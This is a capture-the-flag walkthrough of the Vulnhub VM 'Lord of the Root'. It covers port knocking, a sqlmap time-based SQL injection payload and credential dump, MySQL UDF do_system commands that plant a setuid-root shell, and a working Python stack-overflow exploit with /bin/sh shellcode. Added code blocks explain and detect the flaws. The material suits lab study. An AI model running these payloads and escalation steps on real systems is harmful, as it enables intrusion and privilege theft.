tick.Tack

Lord of the Root

Lord Of The Root from Vulnhub


root@kali:~/_Sec/lord_of_root# nmap -p- -T5 192.168.0.119

Starting Nmap 6.47 ( http://nmap.org ) at 2015-12-26 08:30 EST
Nmap scan report for 192.168.0.119
Host is up (0.00068s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 00:0C:29:FA:7B:62 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 53.53 seconds

After the nmap scan only port 22 is open, and a UDP scan found no open ports either.

So the only option left is to connect to port 22 and have a look.

root@kali:~/_Sec/lord_of_root# ssh 192.168.0.119

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3

“Knock Friend To Enter”: the first gate looks like port knocking.

After knocking, another nmap scan shows one new port:

1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

The website only serves three Lord of the Rings memes.

I downloaded them and looked closely, but nothing seems to be hidden inside.

Next I checked whether robots.txt disallows any special paths, and instead got the odd page below.

And the page source contains a mysterious string:

<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>

Base64-decoding it gives:

Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!

Decoding once more gives:

/978345210/index.php
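The two-step decode above trips up a naive "decode the whole string" approach, because the first layer comes out as a base64 token followed by the plain word "Closer!". The following is an added example for this write-up (not code from the original post): it pulls the comment out of the page source quoted above and peels base64 off token by token until nothing decodes further. The regex tolerates the missing closing "--" in the page's comment.

```python
import base64
import binascii
import re

# Page source as quoted in the write-up (the comment really lacks the closing "--").
PAGE_SOURCE = """<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>"""

# Accept both a proper "<!-- ... -->" and the truncated "<!-- ...>" form.
COMMENT_RE = re.compile(r"<!--\s*(.*?)\s*-{0,2}>", re.S)


def hidden_comments(html):
    """Return the text of every HTML comment in the document."""
    return COMMENT_RE.findall(html)


def decode_token(tok):
    """Strictly base64-decode one token; None unless it yields printable ASCII."""
    try:
        raw = base64.b64decode(tok, validate=True)   # rejects '!' '.' and bad padding
    except (binascii.Error, ValueError):
        return None
    if raw and all(32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None


def peel_base64(text):
    """Return the successive layers: text, then each pass with decodable tokens replaced."""
    layers = [text]
    while True:
        changed = False
        tokens = []
        for tok in layers[-1].split():
            dec = decode_token(tok)
            if dec is None:
                tokens.append(tok)          # e.g. "Closer!" or the final path stay as they are
            else:
                tokens.append(dec)
                changed = True
        if not changed:
            return layers
        layers.append(" ".join(tokens))


if __name__ == "__main__":
    for comment in hidden_comments(PAGE_SOURCE):
        for depth, layer in enumerate(peel_base64(comment)):
            print("layer %d: %s" % (depth, layer))
```

Stopping on the first pass where no token changes is what keeps the loop from mangling the final path: "/978345210/index.php" contains a dot, so strict decoding refuses it and the peeling ends there.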

And so we arrive at the gates of Mordor (?

Seeing such a bare-bones login page, I guessed SQL injection had to be the way in (?

Some basic SQLi strings had no effect,

so I turned to the almighty sqlmap.

root@kali:~/_Sec/lord_of_root# sqlmap --url='http://192.168.0.121:1337/978345210/index.php' --data="username=asd&password=asd&submit= Login" --dump-all --level 5
...
[11:40:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:41:19] [INFO] POST parameter 'username' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
...
[11:41:21] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 2094 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=asd'||(SELECT 'NAyM' FROM DUAL WHERE 8495=8495 AND SLEEP(5) )||'&password=asd&submit= Login
---
[11:46:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[12:09:03] [INFO] starting dictionary-based cracking (mysql_passwd)
[12:09:13] [INFO] cracked password 'darkshadow' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *A55A9B9049F69BC2768C9284615361DFBD580B34
[*] root [1]:
    password hash: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
    clear-text password: darkshadow
[09:50:20] [INFO] fetching columns for table 'Users' in database 'Webapp'
...
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+

The database was dumped successfully.

One table holds username/password pairs that look useful,

and we also got the MySQL root password: darkshadow.
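What sqlmap found is the classic login query built by string concatenation, where the only thing the time-based payload needs is for the database to evaluate SLEEP(). The block below is an added example for this write-up, not the VM's PHP or sqlmap's code: it uses sqlite3 as a stand-in for MySQL, registers a SLEEP() that records calls instead of delaying, creates a one-row DUAL table so sqlmap's payload parses unchanged, and runs that payload against a concatenated query and a parameterised one. The Users rows are constructed from the dump above.

```python
import sqlite3

SLEEP_CALLS = []        # every SLEEP(n) the database actually evaluates lands here


def fake_sleep(seconds):
    """Stand-in for MySQL SLEEP(): record the call rather than delaying."""
    SLEEP_CALLS.append(seconds)
    return 0            # MySQL SLEEP() also returns 0 once the delay has elapsed


def make_db():
    db = sqlite3.connect(":memory:")
    db.create_function("SLEEP", 1, fake_sleep)
    db.execute("CREATE TABLE DUAL (x INTEGER)")         # MySQL's dummy table, emulated
    db.execute("INSERT INTO DUAL VALUES (1)")
    db.execute("CREATE TABLE Users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO Users VALUES (?,?,?)", [
        (1, "frodo", "iwilltakethering"),               # sample rows from the dump
        (2, "smeagol", "MyPreciousR00t"),
    ])
    return db


def login_vulnerable(db, username, password):
    # The user-supplied text becomes part of the SQL statement itself.
    q = "SELECT id FROM Users WHERE username='%s' AND password='%s'" % (username, password)
    return db.execute(q).fetchone()


def login_hardened(db, username, password):
    # Bound parameters travel separately from the statement text, so a quote
    # or a subquery in the username is only ever compared as a literal value.
    q = "SELECT id FROM Users WHERE username=? AND password=?"
    return db.execute(q, (username, password)).fetchone()


# The exact username value sqlmap reported above.
PAYLOAD = "asd'||(SELECT 'NAyM' FROM DUAL WHERE 8495=8495 AND SLEEP(5) )||'"


def demo():
    """Return (SLEEP calls seen by the vulnerable login, SLEEP calls seen by the hardened one)."""
    db = make_db()
    del SLEEP_CALLS[:]
    login_vulnerable(db, PAYLOAD, "asd")
    vulnerable_sleeps = list(SLEEP_CALLS)
    del SLEEP_CALLS[:]
    login_hardened(db, PAYLOAD, "asd")
    hardened_sleeps = list(SLEEP_CALLS)
    return vulnerable_sleeps, hardened_sleeps


if __name__ == "__main__":
    vuln, safe = demo()
    print("concatenated query evaluated SLEEP():", vuln)
    print("parameterised query evaluated SLEEP():", safe)
```

Neither login returns a row for the payload, which is exactly why the injection is "blind": the only signal is the delay, and the parameterised version never produces it. The clear-text passwords in the dump are a separate weakness the same fix does not address.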

Trying these credentials against SSH, the smeagol account finally worked:

Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

261 packages can be updated.
128 updates are security updates.

                            .____    _____________________________
                            |    |   \_____  \__    ___/\______   \
                            |    |    /   |   \|    |    |       _/
                            |    |___/    |    \    |    |    |   \
                            |_______ \_______  /____|    |____|_  /
                                    \/       \/                 \/
 __      __       .__                                ___________      .__                   .___
/  \    /  \ ____ |  |   ____  ____   _____   ____   \_   _____/______|__| ____   ____    __| _/
\   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \   |    __) \_  __ \  |/ __ \ /    \  / __ |
 \        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |     \   |  | \/  \  ___/|   |  \/ /_/ |
  \__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  \___  /   |__|  |__|\___  >___|  /\____ |
       \/       \/          \/            \/     \/       \/                  \/     \/      \/
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
smeagol@LordOfTheRoot:~$

Next I logged in to MySQL to see whether the MySQL UDF exploit I had seen before would work:

mysql> select do_system('cp /bin/sh /home/smeagol/bash');
+------------------------------------------+
| do_system('cp /bin/sh /home/smeagol/bash') |
+------------------------------------------+
|                                        0 |
+------------------------------------------+
1 row in set (0.01 sec)

mysql> select do_system('chmod 4777 /home/smeagol/bash');
+------------------------------------------+
| do_system('chmod 4777 /home/smeagol/bash') |
+------------------------------------------+
|                                        0 |
+------------------------------------------+

Now let's look at the result:

smeagol@LordOfTheRoot:~$ ls -al
...
-rwsrwxrwx  1 root    root    112204 Dec 26 16:43 bash
...
smeagol@LordOfTheRoot:~$ ./sh
bash-4.3$ id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)
bash-4.3$ cat /root/Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf

Root on Lord of the Root! But getting root this way felt a bit too easy,

so I poked around a little more and found three odd programs:

smeagol@LordOfTheRoot:~$ for i in $(find / -perm -4000 2>/dev/null); do ls -al $i; done
...
-rwsr-xr-x 1 root root 5150 Sep 22 13:01 /SECRET/door2/file
-rwsr-xr-x 1 root root 7370 Sep 17 23:08 /SECRET/door1/file
-rwsr-xr-x 1 root root 7370 Sep 17 23:08 /SECRET/door3/file
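Both routes to root on this box leave the same kind of trace: a setuid-root file where none belongs, and in the UDF case one that is also world-writable (chmod 4777 is what produces -rwsrwxrwx). The following is an added example for this write-up (not code from the original post) that audits ls -l style lines for setuid files worth an administrator's attention. The sample lines are constructed from the listings in this write-up plus an ordinary /usr/bin/passwd entry for contrast.

```python
import re

# Constructed sample: the suspicious entries from the write-up plus one normal one.
SAMPLE_LS = """\
-rwsrwxrwx  1 root    root    112204 Dec 26 16:43 /home/smeagol/bash
-rwsr-xr-x 1 root root 5150 Sep 22 13:01 /SECRET/door2/file
-rwsr-xr-x 1 root root 7370 Sep 17 23:08 /SECRET/door1/file
-rwsr-xr-x 1 root root 7370 Sep 17 23:08 /SECRET/door3/file
-rwsr-xr-x 1 root root 47032 Feb 16  2014 /usr/bin/passwd
"""

# Where distribution-owned setuid binaries normally live.
STANDARD_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")
# Locations that unprivileged users can write to.
USER_WRITABLE_DIRS = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# mode links owner group size month day time-or-year path
LS_RE = re.compile(
    r"^([-dlrwxsStT]{10})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(\S+)$"
)


def audit_setuid(ls_output):
    """Return (path, owner, reasons) for every setuid entry that deserves a look."""
    findings = []
    for line in ls_output.splitlines():
        m = LS_RE.match(line.strip())
        if not m:
            continue
        mode, owner, group, path = m.groups()
        if mode[3] not in "sS":             # owner-execute slot: 's'/'S' means setuid
            continue
        reasons = []
        if owner == "root" and mode[8] == "w":
            reasons.append("world-writable setuid-root file")
        if mode[3] == "S":
            reasons.append("setuid bit set without owner execute bit")
        if not path.startswith(STANDARD_DIRS):
            reasons.append("setuid binary outside the standard system directories")
        if path.startswith(USER_WRITABLE_DIRS):
            reasons.append("setuid binary in a user-writable location")
        if reasons:
            findings.append((path, owner, reasons))
    return findings


if __name__ == "__main__":
    for path, owner, reasons in audit_setuid(SAMPLE_LS):
        print("%s (owner %s): %s" % (path, owner, "; ".join(reasons)))
```

On a live host the input would come from the same search the write-up runs, e.g. `find / -perm -4000 -exec ls -l {} + 2>/dev/null`; comparing the non-flagged remainder against the package manager's file lists then catches a setuid binary that was simply dropped into /usr/bin.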

The naming of these files shows the author's love for Lord of the Rings; getting root through them is probably the intended solution.

The three files named file sit in the directories door1, door2 and door3.

Two of them appear to be the same program, and running them does nothing and simply exits.

The remaining one takes an argument and can be made to buffer overflow:

root@kali:~/_Sec/lord_of_root/door3# objdump -D file | grep -A30 main.:
0804845d <main>:
 804845d:       55                      push   %ebp
 804845e:       89 e5                   mov    %esp,%ebp
 8048460:       83 e4 f0                and    $0xfffffff0,%esp
 8048463:       81 ec b0 00 00 00       sub    $0xb0,%esp
 8048469:       83 7d 08 01             cmpl   $0x1,0x8(%ebp)
 804846d:       7f 21                   jg     8048490 <main+0x33>
 804846f:       8b 45 0c                mov    0xc(%ebp),%eax
 8048472:       8b 00                   mov    (%eax),%eax
 8048474:       89 44 24 04             mov    %eax,0x4(%esp)
 8048478:       c7 04 24 40 85 04 08    movl   $0x8048540,(%esp)
 804847f:       e8 8c fe ff ff          call   8048310 <printf@plt>
 8048484:       c7 04 24 00 00 00 00    movl   $0x0,(%esp)
 804848b:       e8 b0 fe ff ff          call   8048340 <exit@plt>
 8048490:       8b 45 0c                mov    0xc(%ebp),%eax
 8048493:       83 c0 04                add    $0x4,%eax
 8048496:       8b 00                   mov    (%eax),%eax
 8048498:       89 44 24 04             mov    %eax,0x4(%esp)
 804849c:       8d 44 24 11             lea    0x11(%esp),%eax
 80484a0:       89 04 24                mov    %eax,(%esp)
 80484a3:       e8 78 fe ff ff          call   8048320 <strcpy@plt>
 80484a8:       b8 00 00 00 00          mov    $0x0,%eax
 80484ad:       c9                      leave
 80484ae:       c3                      ret
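What the listing shows is the whole bug: main reserves a 0xb0-byte frame, points the first strcpy argument at a local buffer at esp+0x11, and passes argv[1] as the source with no length check anywhere. The block below is an added example for this write-up (not code from the original post or from the VM) that does that reading mechanically: it scans 32-bit AT&T-syntax objdump output, tracks the few register moves the listing uses, and reports every strcpy whose destination is a stack buffer together with how many bytes the buffer has before the top of the reserved frame. The disassembly embedded as DOOR3_MAIN is the listing above; only the instruction forms it uses are modelled.

```python
import re

# address: bytes...  mnemonic  operands
LINE_RE = re.compile(r"^\s*([0-9a-f]+):\s+(?:[0-9a-f]{2}\s)+\s*(\S+)\s*(.*)$")


def scan_strcpy(disasm):
    """Return one finding per strcpy() call whose destination is a local stack buffer."""
    frame = None     # bytes reserved by "sub $N,%esp"
    eax = None       # symbolic %eax: ("stack", off), ("argv", off) or ("argv[i]", 0)
    args = {}        # outgoing call arguments staged at (%esp) and 0x4(%esp)
    findings = []
    for line in disasm.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        addr, mnem, ops = m.group(1), m.group(2), m.group(3).replace(" ", "")
        if mnem == "sub" and ops.startswith("$") and ops.endswith(",%esp"):
            frame = int(ops[1:-5], 16)                   # "$0xb0,%esp" -> 176
        elif mnem == "lea" and ops.endswith("(%esp),%eax"):
            off = ops[:-len("(%esp),%eax")]
            eax = ("stack", int(off, 16) if off else 0)  # address of a local buffer
        elif mnem == "mov" and ops == "0xc(%ebp),%eax":
            eax = ("argv", 0)                            # main's second argument
        elif mnem == "add" and ops.startswith("$") and ops.endswith(",%eax") and eax:
            eax = (eax[0], eax[1] + int(ops[1:-5], 16))
        elif mnem == "mov" and ops == "(%eax),%eax" and eax and eax[0] == "argv":
            eax = ("argv[%d]" % (eax[1] // 4), 0)        # dereference: argv[i]
        elif mnem == "mov" and ops == "%eax,(%esp)":
            args[0] = eax
        elif mnem == "mov" and ops == "%eax,0x4(%esp)":
            args[1] = eax
        elif mnem == "call":
            if "<strcpy@plt>" in ops:
                dest, src = args.get(0), args.get(1)
                if dest and dest[0] == "stack" and frame is not None:
                    findings.append({
                        "call": addr,
                        "frame": frame,
                        "dest_offset": dest[1],
                        # Bytes between the buffer start and the top of the reserved
                        # frame. The saved EBP and return address sit just beyond,
                        # after whatever padding "and $0xfffffff0,%esp" inserted,
                        # so the exact distance to them is not knowable statically.
                        "capacity": frame - dest[1],
                        "src": src[0] if src else "unknown",
                    })
            args = {}                                    # arguments consumed by the call
    return findings


# The door3 main() listing from the write-up.
DOOR3_MAIN = """\
0804845d <main>:
 804845d:       55                      push   %ebp
 804845e:       89 e5                   mov    %esp,%ebp
 8048460:       83 e4 f0                and    $0xfffffff0,%esp
 8048463:       81 ec b0 00 00 00       sub    $0xb0,%esp
 8048469:       83 7d 08 01             cmpl   $0x1,0x8(%ebp)
 804846d:       7f 21                   jg     8048490 <main+0x33>
 804846f:       8b 45 0c                mov    0xc(%ebp),%eax
 8048472:       8b 00                   mov    (%eax),%eax
 8048474:       89 44 24 04             mov    %eax,0x4(%esp)
 8048478:       c7 04 24 40 85 04 08    movl   $0x8048540,(%esp)
 804847f:       e8 8c fe ff ff          call   8048310 <printf@plt>
 8048484:       c7 04 24 00 00 00 00    movl   $0x0,(%esp)
 804848b:       e8 b0 fe ff ff          call   8048340 <exit@plt>
 8048490:       8b 45 0c                mov    0xc(%ebp),%eax
 8048493:       83 c0 04                add    $0x4,%eax
 8048496:       8b 00                   mov    (%eax),%eax
 8048498:       89 44 24 04             mov    %eax,0x4(%esp)
 804849c:       8d 44 24 11             lea    0x11(%esp),%eax
 80484a0:       89 04 24                mov    %eax,(%esp)
 80484a3:       e8 78 fe ff ff          call   8048320 <strcpy@plt>
 80484a8:       b8 00 00 00 00          mov    $0x0,%eax
 80484ad:       c9                      leave
 80484ae:       c3                      ret
"""

if __name__ == "__main__":
    for f in scan_strcpy(DOOR3_MAIN):
        print("strcpy at %s: %s -> stack buffer at esp+0x%x, %d bytes to frame top"
              % (f["call"], f["src"], f["dest_offset"], f["capacity"]))
```

For this binary the scanner reports the single call at 80484a3 copying argv[1] into a buffer with 159 bytes of room. The fix in source is a bounded copy (strncpy with an explicit size, or snprintf), and rebuilding the binary with stack protection enabled would turn the overwrite into an abort rather than a controlled return.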

Next, pattern_create.rb and pattern_offset.rb locate the offset at which EIP gets overwritten:

root@kali:~/_Sec/lord_of_root/door3# /usr/share/metasploit-framework/tools/pattern_offset.rb 0x41376641
[*] Exact match at offset 171

Then check whether ASLR is enabled on the target:

smeagol@LordOfTheRoot:/SECRET/door3$ cat /proc/sys/kernel/randomize_va_space
2

ASLR is on, so it looks like we have to rely on a NOP sled and luck:

#!/usr/bin/python

import os
import struct

nopsled = 20000

payload = "A"*171               # trash
payload+= "\x50\x2e\xb0\xbf"    # EIP
payload+= "\x90"*nopsled        # nop sled
payload+= "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"      #shellcode

while True:
        for i in range (1, 4):
                cmd = "/SECRET/door%d/file %s" % (i, payload)
                os.system (cmd)

With a piece of shellcode that execs /bin/sh, the payload is assembled and it's time to gamble on luck:

Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)